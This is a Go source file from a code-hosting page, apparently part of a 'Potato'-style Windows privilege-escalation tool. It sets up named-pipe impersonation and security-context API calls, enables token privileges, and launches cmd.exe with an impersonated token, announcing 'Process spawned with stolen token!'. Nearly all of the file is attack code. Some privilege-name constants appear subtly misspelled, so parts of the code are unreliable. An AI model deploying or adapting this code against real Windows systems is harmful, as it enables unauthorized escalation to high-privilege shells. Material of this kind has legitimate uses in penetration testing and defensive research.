-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy pathgotato.go
124 lines (103 loc) · 3.44 KB
/
gotato.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
package main
import (
"fmt"
"syscall"
"unsafe"
"golang.org/x/sys/windows"
)
/*
type (
BOOL uint32
BOOLEAN byte
BYTE byte
DWORD uint32
DWORD64 uint64
HANDLE uintptr
HLOCAL uintptr
LARGE_INTEGER int64
LONG int32
LPVOID uintptr
SIZE_T uintptr
UINT uint32
ULONG_PTR uintptr
ULONGLONG uint64
WORD uint16
)
*/
const (
SE_IMPERSONATE = "SeImpersonatePrivilege"
SE_ASSIGN_PRIMARY_TOKEN = "SeAssignPrimaryToken"
SE_INCREASE_QUOTE_NAME = "SeIncreaseQuoteName"
SECPKG_CRED_INBOUND = 0x00000001
SECBUFFER_VERSION = 0x00000000
SECBUFFER_TOKEN = 0x00000002
CREATE_NEW_CONSOLE = 0x00000010
ASC_REQ_ALLOCATE_MEMORY = 0x00000100
ASC_REQ_CONNECTION = 0x00000800
SECURITY_NATIVE_DREP = 0x00000010
SecurityImpersonation = 0x00000002
program = "C:\\Windows\\System32\\cmd.exe"
args = ""
)
var (
advapi32DLL = syscall.NewLazyDLL("advapi32.dll")
impersonateNamedPipeClient = advapi32DLL.NewProc("ImpersonateNamedPipeClient")
createProcessWithTokenW = advapi32DLL.NewProc("CreateProcessWithTokenW")
setSecurityDescriptorDacl = advapi32DLL.NewProc("SetSecurityDescriptorDacl")
initializeSecurityDescriptor = advapi32DLL.NewProc("InitializeSecurityDescriptor")
secur32DLL = syscall.NewLazyDLL("Secur32.dll")
acquireCredentialsHandle = secur32DLL.NewProc("AcquireCredentialsHandleW")
acceptSecurityContext = secur32DLL.NewProc("AcceptSecurityContext")
querySecurityContextToken = secur32DLL.NewProc("QuerySecurityContextToken")
)
type ITokenNegotiator interface {
Trigger() bool
Serve() NegotiatorResult
}
type NegotiatorResult struct {
ImpersonationToken *windows.Token
Error error
}
func ExecuteWithToken(token windows.Token) error {
var si windows.StartupInfo
var pi windows.ProcessInformation
_, _, err := createProcessWithTokenW.Call(uintptr(token), 0, uintptr(unsafe.Pointer(windows.StringToUTF16Ptr(program))), uintptr(unsafe.Pointer(windows.StringToUTF16Ptr(args))),
CREATE_NEW_CONSOLE, 0, 0, uintptr(unsafe.Pointer(&si)), uintptr(unsafe.Pointer(&pi)))
if err != syscall.Errno(0) {
fmt.Println("[!] CreateProcessWithTokenW failed, trying CreateProcessAsUser ", err)
err := windows.CreateProcessAsUser(token, windows.StringToUTF16Ptr(program), windows.StringToUTF16Ptr(args), nil, nil, false, CREATE_NEW_CONSOLE, nil, nil, &si, &pi)
if err != nil {
fmt.Println("[!] CreateProcessAsUser failed. You may have the SeImpersonate privilege but are not running in an elevated context")
return err
}
}
fmt.Println("[*] Process spawned with stolen token!")
return nil
}
func EnablePrivilege(securityEntity string) bool {
var luid windows.LUID
var token windows.Token
err := windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(securityEntity), &luid)
if err != nil {
return false
}
handle := windows.CurrentProcess()
err = windows.OpenProcessToken(handle, windows.TOKEN_ADJUST_PRIVILEGES|windows.TOKEN_QUERY, &token)
if err != nil {
return false
}
tokenPrivs := windows.Tokenprivileges{
PrivilegeCount: 1,
Privileges: [1]windows.LUIDAndAttributes{
{
Luid: luid,
Attributes: windows.SE_PRIVILEGE_ENABLED,
},
},
}
err = windows.AdjustTokenPrivileges(token, false, &tokenPrivs, 1024, nil, nil)
if err != nil || windows.GetLastError() != nil {
return false
}
return true
}